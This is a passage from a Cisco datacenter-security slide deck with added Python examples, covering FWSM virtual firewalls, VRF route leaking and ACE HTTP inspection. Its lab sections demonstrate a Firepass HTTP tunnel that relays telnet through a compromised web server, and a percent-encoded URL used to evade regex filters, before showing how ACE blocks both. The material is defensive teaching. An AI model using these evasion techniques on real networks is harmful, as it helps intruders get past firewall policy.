Why run Transparent mode?

(Diagram: Backbone. The MSFC 10.1.2.3 in Vlan20 and a Router 10.1.2.4 in Vlan30 exchange HSRP/VRRP/GLBP hellos to 224.0.0.2 through the transparent FWSM: OK if the ACL permits it.)

 Routers can establish routing protocol adjacencies through the firewall (OSPF, EIGRP, RIP, etc.)
 First-hop redundancy protocols such as HSRP, VRRP, GLBP can cross the firewall
 Multicast streams (PIM, multicast traffic) can also traverse the firewall
 Non-IP traffic can be allowed (pre-configured types are BPDUs, IPX, MPLS)

Virtual Firewall Resource Manager

 In system mode, up to 256 classes can be defined
 Individual contexts are then mapped to classes
 Within a class, limits can be applied to specific resources:
  • Rate-limited: Conns (connections/sec), Fixups (fixups/sec), Syslogs (syslogs/sec)
  • Absolute limits: Conns (connections), Hosts, IPsec (management tunnels), SSH (sessions), Telnet (sessions), Xlates, MAC entries, ALL
 Limits are specified as an integer or a percentage; 0 means no limit
 Resources can be oversubscribed: e.g. a class assigns a maximum of 10% of a resource, but 50 contexts are mapped to it. The per-context cap then still protects contexts from each other, but no longer guarantees that the aggregate stays within the module's capacity.

Resource limiting and monitoring

(Output of "show resource usage" and "show resource usage resource bridge-table-entries" on FWSM-6K1-2043: one row per resource (Conns, Xlates, Hosts, Telnet, bridge-table-entries) and context (admin, client-hsrp, server-hsrp, system), with Current, Peak, Limit (a number or "unlimited") and Denied columns. The Denied column counts the allocations the Resource Manager refused to that context and is the one to watch.)

Virtual Firewall Concept - Contexts

(Diagram: Cat6K with VRFs facing an MPLS cloud or VRF-Lite; VLAN 101,102 on the inside of the VFW contexts, trunk VLAN 111,112 on the outside towards the Internet Edge.)

Cat6K (MSFC) side:
  interface Vlan101
   ip vrf forwarding VPN1
   ip address 10.10.101.1 255.255.255.0
  interface Vlan102
   ip vrf forwarding VPN2
   ip address 10.10.102.1 255.255.255.0

FWSM side:
  context Blue
   logical-interface vlan101
   logical-interface vlan111
  context Red
   logical-interface vlan102
   logical-interface vlan112

 Routed or Transparent mode
 Independent policies per context
 Independent management per context

Inter-VPN Communication (2a): FW in Single Routed Mode (No Contexts)

(Diagram: VRF VPN1 with 10.1.1.0/24 on VLAN 110 and VRF VPN2 with 20.1.1.0/24 on VLAN 120; the FWSM connects to VPN1 over VLAN 2010, 10.11.1.0/24, and to VPN2 over VLAN 2020, 20.11.1.0/24; OSPF runs between each VRF and the FW.)

 The FW is an OSPF router. Traffic from one VRF to the other is entirely governed by the security policy defined on the FWSM.

Inter-VPN Communication (2b): FW in Transparent Mode

(Diagram: VRF VPN1 and VRF VPN2 run OSPF and PIM to each other across the transparent FW; VLAN 400 and VLAN 401 bridge 10.225.225.0/24, VLAN 404 carries 10.220.220.0/24, and VLAN 120 carries 20.1.1.0/24.)

 The FW does not participate in the IGP. Traffic from one VRF to the other is entirely governed by the security policy defined on the FW.

Inter-VPN Communication: Multi-Context Transparent Mode, Pairs

(Diagram: VRF1, VRF2 and VRF3 exchange OSPF through contexts cxt1, cxt2 and cxt3, one transparent context per VRF pair.)

 One context per VRF pair, transparent mode
 Filtering rules have to be configured multiple times, once for each VRF pair

Inter-VPN Communication: Multi-Context Transparent Mode, Pairs (continued)

(Diagram: four VRFs (VRF1 to VRF4) plus a Shared Services block already need contexts cxt1 to cxt6; where Shared Services attaches is left as a question mark.)

 One context per VRF pair, transparent mode
 Filtering rules have to be configured multiple times, once for each VRF pair
 Very limited scalability (the number of contexts grows with the number of VRF pairs), so an alternative is required
 How should shared services be reached?

Inter-VPN Communication (2c): Transparent Mode, Fusion Router / VRF

(Diagram: a Fusion Router/VRF as hub, with Shared Services attached to it; VRF1, VRF2 and VRF3 reach the hub through FW contexts ctx1, ctx2 and ctx3, running OSPF or EIGRP.)

 Fusion Router/VRF (hub and spoke): all inter-VPN traffic must go through this Router/VRF
 FW contexts could be managed per VPN
 The routing protocol between VRFs could be EIGRP to allow route filtering capabilities

Fusion VRF, Single Device Implementation

eBGP peering between VRFs on a single router

(Diagram: the Fusion VRF with Shared Services peers over eBGP with VRF1, VRF2 and VRF3 through contexts ctx1, ctx2 and ctx3, all on one device.)

 All VRFs (including the Fusion VRF) reside on the same physical device
 eBGP peering within the same device requires:
  – a BGP router-id per VRF
  – Multi-AS support for BGP

Route Leaking Between VRFs

Single box extranet: using a BGP process to leak the routes between VRFs

(Diagram: Blue, Red and Shared Services VRFs; import/export between VRFs using route targets (RT).)

Single Box Extranet Implementation: BGP Process

  router bgp 65001
   bgp log-neighbor-changes
   !
   address-family ipv4 vrf BLUE
    redistribute ospf 2
    no auto-summary
    no synchronization
   exit-address-family
   !
   address-family ipv4 vrf RED
    redistribute ospf 1
    no auto-summary
    no synchronization
   exit-address-family
   !
   address-family ipv4 vrf SERVICES
    redistribute ospf 3
    no auto-summary
    no synchronization
   exit-address-family
  !

 Need a BGP process to leak the routes between VRFs
 Don't need any BGP neighbors/sessions

Single Box Extranet Implementation: VRF Configuration, Services Extranet VPN

  ip vrf SERVICES
   rd 10:10
   route-target export 1:1
   route-target import 1:1
   route-target import 3:3
   route-target import 2:2
  !
  ip vrf RED
   rd 30:30
   route-target export 3:3
   route-target import 3:3
   route-target import 1:1
  !
  ip vrf BLUE
   rd 20:20
   route-target export 2:2
   route-target import 2:2
   route-target import 1:1

SERVICES imports the route targets exported by RED (3:3) and BLUE (2:2), while RED and BLUE each import only their own RT and the SERVICES RT (1:1): both spokes see the shared services, but not each other.
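The RT import/export lists above are what actually decide which VRF sees which routes, so here is an added worked model of that logic in Python. This is example code written for this page, not IOS or Cisco code: it uses the slide's VRF names, RDs and route targets, but the prefixes, the leak_routes / exchange_pairs helpers and the misconfiguration check at the end are assumptions for illustration.

```python
"""Route-target import/export between VRFs on one box (single-box extranet).

Added example for the SERVICES/RED/BLUE configuration above; it is not IOS
code. It models only the RT semantics the BGP process applies: a VRF receives
another VRF's routes when one of the origin's export RTs is in its own import
list. RD/RT values are the slide's; the prefixes are constructed sample data.
"""
from __future__ import annotations

from dataclasses import dataclass, field


@dataclass
class Vrf:
    name: str
    rd: str
    export_rt: set[str]
    import_rt: set[str]
    local: set[str] = field(default_factory=set)   # e.g. learned via redistribute ospf N


def leak_routes(vrfs: list[Vrf]) -> dict[str, dict[str, str]]:
    """Return {vrf_name: {prefix: origin_vrf}} after RT-based import.

    Local routes are always present; a remote route is imported when the
    origin's export RTs intersect the receiver's import RTs. No BGP neighbours
    are needed for this, exactly as the slide notes: the process only leaks.
    """
    tables: dict[str, dict[str, str]] = {}
    for rx in vrfs:
        table = {p: rx.name for p in rx.local}
        for tx in vrfs:
            if tx is not rx and tx.export_rt & rx.import_rt:
                for p in tx.local:
                    table.setdefault(p, tx.name)    # a local route wins over an imported one
        tables[rx.name] = table
    return tables


def exchange_pairs(tables: dict[str, dict[str, str]]) -> set[tuple[str, str]]:
    """(receiver, origin) pairs that actually see each other's routes.

    This is the check to run after any RT change: an accidental import of one
    spoke's RT into another spoke shows up here as an unexpected pair.
    """
    return {(rx, origin) for rx, t in tables.items() for origin in t.values() if origin != rx}


def build_extranet() -> list[Vrf]:
    # RD/RT values from the slide; the /16 prefixes are constructed sample routes
    services = Vrf("SERVICES", "10:10", {"1:1"}, {"1:1", "3:3", "2:2"}, {"10.1.0.0/16"})
    red = Vrf("RED", "30:30", {"3:3"}, {"3:3", "1:1"}, {"10.30.0.0/16"})
    blue = Vrf("BLUE", "20:20", {"2:2"}, {"2:2", "1:1"}, {"10.20.0.0/16"})
    return [services, red, blue]


if __name__ == "__main__":
    for vrf_name, table in leak_routes(build_extranet()).items():
        print(vrf_name, sorted(table.items()))
    # Misconfiguration: importing BLUE's RT into RED leaks BLUE into RED.
    broken = build_extranet()
    broken[1].import_rt.add("2:2")
    print(sorted(exchange_pairs(leak_routes(broken))))
```

With the slide's values, RED and BLUE each receive 10.1.0.0/16 from SERVICES but not each other's prefix, and exchange_pairs contains only spoke-to-hub pairs; adding "2:2" to RED's import list makes ("RED", "BLUE") appear, which is the regression to look for whenever the RT lists are edited.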

Deployment example

(Diagram: a campus and datacenter network with Access (1), Distribution (2), Core (3), Distribution (4) and Access (5) layers built on Cat 6K switches: core switches CORE-G and CORE-D, distribution pairs Dist-HD/Dist-HG and Dist-BD/Dist-BG, WAN1-SW and WAN2-SW, and the Toip1-SW and SSE-SW edge switches (6, 7). FWSMs sit in the core and distribution Cat 6Ks; the slide marks "Need FW here!" at the access, distribution and core layers.)

Security Domains?

(Diagram: security domains filtered by the core FW versus security domains not filtered by the core FW. User VLANs: user security domain n°1 (Vlan 110, Vlan 111), user security domain n°2 (Vlan 120), plus user Vlan 10, Vlan 11, Vlan 12. Server VLANs: server security domain n°1 (Vlan 210, Vlan 211), server security domain n°2 (Vlan 220, Vlan 221, Vlan 222), plus server Vlan 20, Vlan 21, Vlan 22.)

Virtual architecture / FW: LAN, site X

(Diagram: a pair of Distrib/user 6500/SUP720, a pair of Core 6500/SUP720 and a pair of Distrib/Servers 6500/SUP720. User VLAN n°1: not filtered. User VLAN n°2: filtered (green security domain). Server VLAN n°1: filtered (red security domain). Server VLAN n°2: filtered (yellow security domain). Server VLANs n°3 and n°4: not filtered.)

Agenda

 Datacenter Security Threats
 Datacenter Design Overview
 Secure a Cisco Datacenter Infrastructure
 Datacenter Virtualization
 Cisco IP service in virtualized architecture examples
  – Virtualized central Firewall deployment example
  – How the ACE load balancer helps to secure the server farm
   • HTTP inspection in action: HTTP tunneling
   • HTTP inspection in action: URL canonicalization

What Is ACE? Application Control Engine

 New product line in the Cisco ANS portfolio
 Infrastructure simplicity in a single hardware platform: ACE integrates content switching, SSL offload and datacenter security features
 The first ACE product is a Cisco Catalyst 6500 service module, which comes in three flavours: 4 Gbps, 8 Gbps and 16 Gbps
 The hardware supports two field-replaceable daughtercards for future hardware-accelerated application delivery functionality like HTTP compression
 It delivers application infrastructure control, with features like virtual partitions and native role-based access control (RBAC)

IP Services & Security, e.g. Load Balancing / SSL with ACE

(Diagram: one physical device partitioned into an Admin Context (global configuration, context definition, resource allocation, admin management) and the virtual partitions V-Rack 1, V-Rack 2, V-Rack 3; a management station authenticates through AAA.)

Security Features in ACE

 TCP/IP normalization
  – Built-in transport protocol security
  – User configurable, to meet security requirements
 Application protocol inspection
 Advanced HTTP inspection
  – RFC compliance
  – MIME type validation
  – Prevent tunneling protocols over HTTP ports

TCP exploits blocked by ACE

1. TCP checks performed by default:
 Enforces correct usage of TCP flags (can be disabled; flags can be cleared)
 Randomization of sequence numbers (cloaks the OS type, makes fingerprinting recon unreliable and defeats blind session hijacking based on sequence number prediction; it does not protect against an attacker who is on the path)
 Enforces correct header length
 Prevents out-of-state packets
 Prevents packets that do not belong to existing connections
 Possibility to define a maximum number of connections per second
 Matches the TCP length with the IP header's length + data
 Blocks illicit ports (port = zero)
 Enforces minimum and maximum MSS

Example of blocked attacks: TearDrop, session hijacking, Jolt, Bloop, Targa, Bonk, Boink, Fraggle, Xmas scan, null scan, etc.

IP / UDP / ICMP exploits blocked by ACE

1. IP checks performed by ACE:
 Automatic anti-spoofing (source IP = destination IP); unicast RPF check
 Header length check (min and max lengths, L3 length must not exceed L2)
 IP options control
 Drop illicit IP addresses (source IP = class D, or broadcast, or loopback)
 Overlapping fragments dropped, control over the maximum number of fragments
 ARP inspection in transparent mode

2. ICMP checks performed by default:
 Requests and responses matching
 Prevents injection of unsolicited ICMP errors
 Countermeasures specified in draft-gont-tcpm-icmp-attacks.txt

Blocked attacks: timestamp / record route / source routing / fragment DoS attacks, IP spoofing, Ping of Death, ICMP flood, Smurf, ARP attacks
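The TCP and IP checks on the two slides above are simple enough to write down, and doing so shows what each one actually rejects. The following is an added example written for this page, not ACE code: a stateless Python version of the per-packet checks (source equals destination, illicit source addresses, header-length consistency against the frame, illegal TCP flag combinations, port zero, MSS bounds). The Packet structure, the MSS window and the sample packets are constructed assumptions; the stateful checks (out-of-state packets, connection rate) are left out.

```python
"""Stateless TCP/IP sanity checks of the kind ACE applies by default.

Added example, not ACE code: a pure-Python version of the per-packet checks on
the two slides above (source = destination spoofing, illicit source addresses,
header-length consistency, illegal TCP flag combinations, port zero, MSS
bounds). The MSS bounds and the sample packets are constructed assumptions.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass
from typing import Optional

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
XMAS = FIN | PSH | URG
MSS_MIN, MSS_MAX = 536, 1460      # assumed enforced MSS window


@dataclass
class Packet:
    src: str
    dst: str
    ihl: int              # IP header length in bytes (field value * 4)
    total_len: int        # IP total length field
    frame_len: int        # bytes of L3 actually present on the wire
    sport: int
    dport: int
    flags: int
    data_offset: int      # TCP header length in bytes
    mss: Optional[int] = None
    ip_options: bool = False


def ip_checks(p: Packet) -> list[str]:
    v: list[str] = []
    src, dst = ipaddress.ip_address(p.src), ipaddress.ip_address(p.dst)
    if src == dst:
        v.append("anti-spoof: source equals destination")
    if src.is_multicast:
        v.append("illicit source: class D")
    if src.is_loopback:
        v.append("illicit source: loopback")
    if src == ipaddress.ip_address("255.255.255.255"):
        v.append("illicit source: broadcast")
    if not 20 <= p.ihl <= 60:
        v.append("bad IP header length")
    elif p.total_len < p.ihl:
        v.append("IP total length shorter than header")
    if p.total_len > p.frame_len:        # the slide's "L3 < L2" rule
        v.append("L3 length exceeds L2 frame")
    if p.ip_options:                     # IP options control: deny by default
        v.append("IP options present")
    return v


def tcp_checks(p: Packet) -> list[str]:
    v: list[str] = []
    if p.sport == 0 or p.dport == 0:
        v.append("illicit port zero")
    if p.flags == 0:
        v.append("null scan: no flags set")
    if (p.flags & XMAS) == XMAS:
        v.append("xmas scan: FIN, PSH and URG set")
    if p.flags & SYN and p.flags & (FIN | RST):
        v.append("SYN combined with FIN or RST")
    if not 20 <= p.data_offset <= 60:
        v.append("bad TCP header length")
    elif p.total_len - p.ihl < p.data_offset:
        v.append("TCP header does not fit in IP payload")
    if p.mss is not None and not MSS_MIN <= p.mss <= MSS_MAX:
        v.append(f"MSS {p.mss} outside [{MSS_MIN}, {MSS_MAX}]")
    return v


def verdict(p: Packet) -> tuple[str, list[str]]:
    violations = ip_checks(p) + tcp_checks(p)
    return ("drop" if violations else "pass"), violations


CLIENT, SERVER = "10.20.10.100", "10.10.10.101"     # hosts from the slides' lab
SAMPLES = {   # constructed packets, not captures
    "clean_syn":     Packet(CLIENT, SERVER, 20, 44, 44, 50281, 80, SYN, 24, mss=1460),
    "land":          Packet(SERVER, SERVER, 20, 40, 40, 80, 80, SYN, 20),
    "xmas":          Packet(CLIENT, SERVER, 20, 40, 40, 40000, 80, XMAS, 20),
    "null":          Packet(CLIENT, SERVER, 20, 40, 40, 40000, 80, 0, 20),
    "port_zero":     Packet(CLIENT, SERVER, 20, 40, 40, 0, 80, SYN, 20),
    "truncated":     Packet(CLIENT, SERVER, 20, 1500, 60, 40000, 80, ACK, 20),
    "tiny_mss":      Packet(CLIENT, SERVER, 20, 44, 44, 40000, 80, SYN, 24, mss=48),
    "multicast_src": Packet("224.0.0.2", SERVER, 20, 40, 40, 40000, 80, SYN, 20),
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(f"{name:14} {verdict(pkt)}")
```

Only the clean SYN passes; every other sample returns "drop" with the list of rules it broke, which is the form a normalizer's log should take so that a tuning decision (for instance allowing IP options for a specific host) can be made per rule.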

TCP/IP protocol exploits prevented by ACE

1. FTP abuse
 ACE's FTP inspection engine can match requests and responses
 Drop truncated commands
 Checks the size of RETR / STOR commands
 Enforce RFC compliance
 Block PASV sent from clients
 Verify the range of dynamically negotiated ports

2. DNS exploits
 ACE matches DNS requests and responses
 Enforces label length checks
 Tears down UDP connections after reception of a reply

 Blocked attacks: FTP 'PORT' attacks, FTP bounce, DNS floods

"Level 1" HTTP attacks blocked by ACE

1. Encrypted channel attacks - HTTPS decryption: ACE is equipped with a powerful SSL offload/termination chip, giving it full visibility into attacks hoping to get around security devices by riding on top of an encrypted channel
2. Worms and day-zero attacks: ACE's HTTP inspection engine contains a powerful, fully customizable regular expression engine. Using regular expressions, users can develop signatures that block worms and attacks for which no remedy has been published yet. Regexes can be applied to the headers, the URL or even the payload of HTTP traffic.
3. RFC compliance: ACE's HTTP inspection engine automatically enforces RFC 2616 compliance and can drop any methods, MIME types or transfer encodings as configured by the user
4. Buffer overflows: a maximum HTTP header length can be enforced, blocking attempts at buffer overflow exploits
5. Directory traversals: an attempt at working one's way up an HTTP server's directory structure by using ../.. in GET requests. Easily blocked by ACE's regular expression filters, which are applied after URL canonicalization so that encoded variants such as %2e%2e%2f are caught as well.
6. Malicious URLs: ACE always canonicalizes URLs, defeating attacks that rely on encoded URLs
7. Peer-to-peer, instant messaging, HTTP tunnels: traffic tunneled over HTTP can be blocked by ACE's HTTP inspection engine

HTTP inspection in action: HTTP tunneling

Introducing HTTP tunnels

 Various free or commercial programs take client traffic (any TCP/UDP) and relay it to an accomplice web server over HTTP (using POST requests most of the time)
 They use properly formatted HTTP, so the traffic:
  – passes L4 firewalls
  – passes standard HTTP checks (RFC compliance, etc.)
 The web server demuxes the traffic and sends it to the intended recipient/target
 Programs include: Firepass, HTun, Httptunnel, Hopster, …

HTTP Tunnel Example

(Topology: client 10.20.10.100 in vlan 20, ACE (10.20.10.4 on vlan 20, 10.10.10.4 on vlan 100), a router, the compromised web server 10.10.10.101, and the real target 10.48.82.65 behind it.)

  switch/lab# sh run int
  Generating configuration....
  interface vlan 20
    ip address 10.20.10.4 255.255.255.0
    access-group input http_inbound
    no shutdown
  interface vlan 100
    ip address 10.10.10.4 255.255.255.0
    no shutdown

  switch/lab# sh run access-list
  access-list http_inbound line 10 extended permit tcp any any eq www

ACE only permits HTTP, yet the client can still telnet to the target!

Client-side Firepass config

  [root@redhatAS4 fpclient]# more conf/fpclient.rules
  #
  # fpclient.rules
  # FIREPASS redirect rules file
  # VERSION 1.1.2a
  #
  # Syntax:
  # local_port local_protocol target_name_or_ip target_port target_protocol[CR]
  #
  # Any number of spaces or tabs may separate the values
  #
  # Examples:
  # 7474 udp 111.222.33.4 80 tcp
  # FIREPASS client will listen on local port 7474/udp and ask FIREPASS server
  # to redirect data flow to target server 111.222.33.4, port 80/tcp.
  # 8080 tcp www.proxy.com 3128 tcp
  # FIREPASS client will listen on local port 8080/tcp and ask FIREPASS server
  # to redirect data flow to target server www.proxy.com, port 3128/tcp.
  ################################################################################
  8000 tcp 10.48.82.65 23 tcp

  [root@redhatAS4 fpclient]# ./fpclient.pl conf/fpclient.conf 10.10.10.101/cgi-bin/firepass-1.1.2a/fpserver/fpserver.cgi

The single active rule listens on local port 8000/tcp and asks the server-side Firepass CGI on the compromised web server to relay the data to 10.48.82.65, port 23/tcp.

HTTP Tunneling in action

1. The client initiates a connection to local port 8000:

  [root@redhatAS4 fpclient]# telnet localhost 8000
  Trying 127.0.0.1...
  Connected to localhost.localdomain (127.0.0.1).
  Escape character is '^]'.
  ----------------------------------------------------------------------
  NOTICE
  Use your TAC SUN userid and PASSWORD to access this host
  ----------------------------------------------------------------------
  User Access Verification
  Password:
  --------------------------------------------------------------
  | *** Please do not alter the config. ***                     |
  | This host is maintained by CALO. Please report any          |
  | problems by submitting a CALO case at http://calo.cisco.com |
  --------------------------------------------------------------
  MSFC2> sh stand brief | incl 82.65
  Vl822  11  255  P  Active  local  10.48.82.66  10.48.82.65

The telnet session rides inside HTTP POSTs to the web server and lands on the target's login prompt; the "sh stand brief" output shows the target is the MSFC that is HSRP active for the virtual address 10.48.82.65.

What shows up in the logs

 Sep 7 2006 14:51:00 lab: %ACE-6-302022: Built TCP connection 0x59 for vlan20:10.20.10.100/50281 (10.20.10.100/50281) to vlan100:10.10.10.101/80 (10.10.10.101/80)
 Sep 7 2006 14:59:00 lab: %ACE-6-302023: Teardown TCP connection 0x59 for vlan20:10.20.10.100/50281 to vlan100:10.10.10.101/80 duration 0:08:00 bytes 939 TCP FINs

Nothing here distinguishes the tunnel from an ordinary eight-minute HTTP session: the logs show only a permitted TCP/80 connection.

Client-side packet decoding

  IP, Src: 10.20.10.100 (10.20.10.100), Dst: 10.10.10.101 (10.10.10.101)
  TCP, Src Port: 50418 (50418), Dst Port: http (80), Seq: 1, Ack: 1, Len: 299
  Hypertext Transfer Protocol
    POST /cgi-bin/firepass-1.1.2a/fpserver/fpserver.cgi HTTP/1.1\r\n
      Request Method: POST
      Request URI: /cgi-bin/firepass-1.1.2a/fpserver/fpserver.cgi
      Request Version: HTTP/1.1
    Content-Type: application/octet-stream\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)\r\n
    Host: 10.10.10.101\r\n
    Content-Length: 0\r\n
    X-Session: 7\r\n
    X-Counter: 1\r\n
    X-Connection: alive\r\n
    X-Host: 10.48.82.65\r\n
    X-Port: 23\r\n
    X-Proto: tcp\r\n
    \r\n

The X-* headers are interpreted by the server-side Firepass tunnel application (X-Host, X-Port and X-Proto name the real target). The server responds with a 200 and an octet-stream body to deliver the data back to the client:

  Hypertext Transfer Protocol
    HTTP/1.1 200 OK\r\n
      Request Version: HTTP/1.1
      Response Code: 200
    Date: Fri, 08 Sep 2006 08:57:32 GMT\r\n
    Server: Apache/2.0.40 (Red Hat Linux)\r\n
    X-Connection: alive\r\n
    Content-Length: 301\r\n
    Connection: close\r\n
    Content-Type: application/octet-stream\r\n
    \r\n
    Media Type: application/octet-stream (301 bytes)

So how do I block that traffic??

 Drastic solution: block the POST request method, but that is likely to break browsing to tons of web sites
 Better solution: build a custom regex to catch the X-headers. The Firepass client identifies its connection using these headers:
  • X-Session
  • X-Counter

Let's build the policy on ACE

1. Define a class-map that matches port 80:

  switch/lab(config)# class-map match-any http
  switch/lab(config-cmap)# match port tcp eq www

2. Build header regexes: if we see both headers, match!

  switch/lab(config)# class-map type http inspect match-all headers
  switch/lab(config-cmap-http-insp)# match header X-Counter header-value .*
  switch/lab(config-cmap-http-insp)# match header X-Session header-value .*

3. Instruct ACE to reset connections that match the regex:

  switch/lab(config)# policy-map type inspect http all-match htpolicy
  switch/lab(config-pmap-ins-http)# class headers
  switch/lab(config-pmap-ins-http-c)# reset

4. Apply the HTTP policy to port-80 traffic:

  switch/lab(config)# policy-map multi-match nofirepass
  switch/lab(config-pmap)# class http
  switch/lab(config-pmap-c)# inspect http policy htpolicy url-logging

5. Map the policy to the client-side interface:

  switch/lab(config)# int vlan 20
  switch/lab(config-if)# service-policy input nofirepass
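To make the match-all header rule above concrete, here is an added example written for this page, not ACE code: a minimal HTTP/1.1 request parser and the same policy (X-Session and X-Counter both present, any value, results in a reset). The Firepass request is rebuilt from the decoded POST on the earlier slide; the browser request, the single-header request and the lower-cased variant are constructed for contrast, and the parse_request / inspect helpers are this example's own.

```python
"""Match-all header policy against Firepass-style HTTP tunnels.

Added example, not ACE code: a minimal HTTP/1.1 request parser plus the same
rule as the ACE class-map above (X-Session and X-Counter both present => the
connection is reset). The Firepass request is rebuilt from the decoded POST on
the earlier slide; the other requests are constructed for contrast.
"""
from __future__ import annotations

import re

# header name (compared case-insensitively, as RFC 2616 requires) -> value regex
HEADER_POLICY = {"x-session": re.compile(r".*"), "x-counter": re.compile(r".*")}


def parse_request(raw: bytes) -> tuple[str, str, dict[str, str]]:
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, version = lines[0].split(" ")
    if not version.startswith("HTTP/1."):
        raise ValueError("not HTTP/1.x")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon or not name or name != name.strip():
            raise ValueError(f"malformed header line: {line!r}")
        key = name.lower()          # lower-case so 'x-session' cannot slip past the rule
        value = value.strip()
        headers[key] = f"{headers[key]}, {value}" if key in headers else value
    return method, target, headers


def match_all(headers: dict[str, str], policy: dict[str, re.Pattern]) -> bool:
    return all(n in headers and rx.fullmatch(headers[n]) for n, rx in policy.items())


def inspect(raw: bytes) -> str:
    """'reset' for tunnel traffic or unparsable requests, otherwise 'permit'."""
    try:
        _method, _target, headers = parse_request(raw)
    except ValueError:
        return "reset"              # RFC-compliance failure: drop it, as ACE would
    return "reset" if match_all(headers, HEADER_POLICY) else "permit"


FIREPASS_POST = (          # rebuilt from the capture on the earlier slide
    b"POST /cgi-bin/firepass-1.1.2a/fpserver/fpserver.cgi HTTP/1.1\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)\r\n"
    b"Host: 10.10.10.101\r\n"
    b"Content-Length: 0\r\n"
    b"X-Session: 7\r\nX-Counter: 1\r\nX-Connection: alive\r\n"
    b"X-Host: 10.48.82.65\r\nX-Port: 23\r\nX-Proto: tcp\r\n\r\n"
)
# constructed variants: same tunnel with odd header casing, a normal GET, a single header
LOWERCASED = FIREPASS_POST.replace(b"X-Session", b"x-session").replace(b"X-Counter", b"x-COUNTER")
BROWSER_GET = b"GET /index.html HTTP/1.1\r\nHost: 10.10.10.101\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
ONE_HEADER = b"POST /upload HTTP/1.1\r\nHost: 10.10.10.101\r\nX-Session: 7\r\nContent-Length: 0\r\n\r\n"

if __name__ == "__main__":
    for label, req in [("firepass", FIREPASS_POST), ("lowercased", LOWERCASED),
                       ("browser", BROWSER_GET), ("one header", ONE_HEADER)]:
        print(f"{label:11} {inspect(req)}")
```

The match-all rule is a signature: it catches the stock Firepass client, and only the stock client. Renaming the two headers in the tunnel software evades it, so treat this as a quick win and keep the POST-to-unknown-CGI pattern and the url-logging output in view as well.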

Verification

1. Log when the HTTP filtering policy is applied:

  lab %ACE-6-302022: Built TCP connection 0x76 for vlan20:10.20.10.100/52431 (10.20.10.100/52431) to vlan100:10.10.10.101/80 (10.10.10.101/80)
  lab %ACE-5-304001: User: 10.20.10.100 Accessed URL 10.10.10.101:/cgi-bin/firepass-1.1.2a/fpserver/fpserver.cgi
  lab %ACE-6-302023: Teardown TCP connection 0x76 for vlan20:10.20.10.100/52431 to vlan100:10.10.10.101/80 duration 0:00:00 bytes 508 Policy Close

The connection is now torn down by policy after 508 bytes instead of living for eight minutes, and url-logging records the tunnel CGI path. The client sees the reset ACE sends on the server's behalf:

  Source: 10.10.10.101 (10.10.10.101)  Destination: 10.20.10.100 (10.20.10.100)
  Transmission Control Protocol, Src Port: http (80), Dst Port: 52541 (52541), Seq: 1, Ack: 265, Len: 0
    Source port: http (80)
    Destination port: 52541 (52541)
    Sequence number: 1 (relative sequence number)
    Acknowledgement number: 265 (relative ack number)
    Header length: 20 bytes
    Flags: 0x0014 (RST, ACK)
      0... .... = Congestion Window Reduced (CWR): Not set
      .0.. .... = ECN-Echo: Not set
      ..0. .... = Urgent: Not set
      ...1 .... = Acknowledgment: Set
      .... 0... = Push: Not set
      .... .1.. = Reset: Set
      .... ..0. = Syn: Not set
      .... ...0 = Fin: Not set
    Window size: 17408
    Checksum: 0x7629 [correct]

HTTP inspection in action: URL canonicalization

HTTP inspection: URL Normalization

 Normalization of all traffic to a canonical form before applying policies
  – feature only found on ACE, AVS & ASA
 Stops attacks disguised by encoding URLs

(Diagram: an encrypted, percent-encoded request such as %2Fhomepage%2Findex%2F... flows through three stages: terminate and decrypt SSL, normalize (giving /homepage/index/pictures/gog.html), then apply the security policy.)

Bypassing regex / IPS filters

• Insert your favorite average phishing URL: a Yahoo redirector link of the form http://rds.yahoo.com/_ylt=...;_ylu=.../SIG=.../EXP=.../**http%3a//198.133.219.25/%65%6E%2F%55%53%2F... whose real target path is percent-encoded byte by byte (the encoded path ends in %64%61%74%61%5F%73%68%65%65%74%2E%68%74%6D%6C, i.e. data_sheet.html). A regex written for the plain-text path never sees the string it is looking for.
• Here's what ACE / PIX show when logging that URL:

  ACE-5-304001: User: 10.48.82.104 Accessed URL 216.109.117.136:/_ylt=...;_ylu=.../**http%3a//198.133.219.25/%65%6E%2F... (the URL is logged as the client sent it, still encoded)

ACE normalizes the URL

 Write your regex in plain ASCII – ACE takes care of the rest

class-map type http inspect match-any testhttp2
  match url .*data_sheet

Sep 13 2006 18:49:27 Admin: %ACE-6-302022: Built TCP connection 0x35 for vlan1822:10.48.82.104/59991 (10.48.82.104/59991) to vlan822:216.109.117.136/80 (216.109.117.136/80)
Sep 13 2006 18:49:27 Admin: %ACE-5-304001: User: 10.48.82.104 Accessed URL 216.109.117.136:/_ylt=… [the same percent-encoded URL as on the previous slide]
Sep 13 2006 18:49:27 Admin: %ACE-6-302023: Teardown TCP connection 0x35 for vlan1822:10.48.82.104/59991 to vlan822:216.109.117.136/80 duration 0:00:00 bytes 859 Policy Close
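The normalize-then-apply-policy flow of the URL Normalization slide and the plain-ASCII regex of the ACE class-map above, as an added example that is not part of the deck and not Cisco ACE code: a small Python canonicalizer (hypothetical helper names) that percent-decodes until the path stops changing and collapses dot-segments, then runs the deck's regex `.*data_sheet` on both the raw and the canonical path. The inputs are constructed, modelled on the slides; the example goes slightly beyond them by also handling double encoding and `..` segments.

```python
import re
from urllib.parse import unquote

MAX_DECODE_PASSES = 3  # bound re-decoding so nested encodings cannot loop forever


def canonicalize_path(path):
    """Return (canonical_path, decode_passes). Percent-decoding is repeated until
    the string stops changing (so %252F -> %2F -> /), then '.', '..' and empty
    segments are collapsed so every spelling of a path reaches one canonical form."""
    decoded, passes = path, 0
    for _ in range(MAX_DECODE_PASSES):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded, passes = nxt, passes + 1
    parts = []
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()  # never climb above the web root
            continue
        parts.append(seg)
    return "/" + "/".join(parts), passes


def url_matches(path, pattern=r".*data_sheet"):
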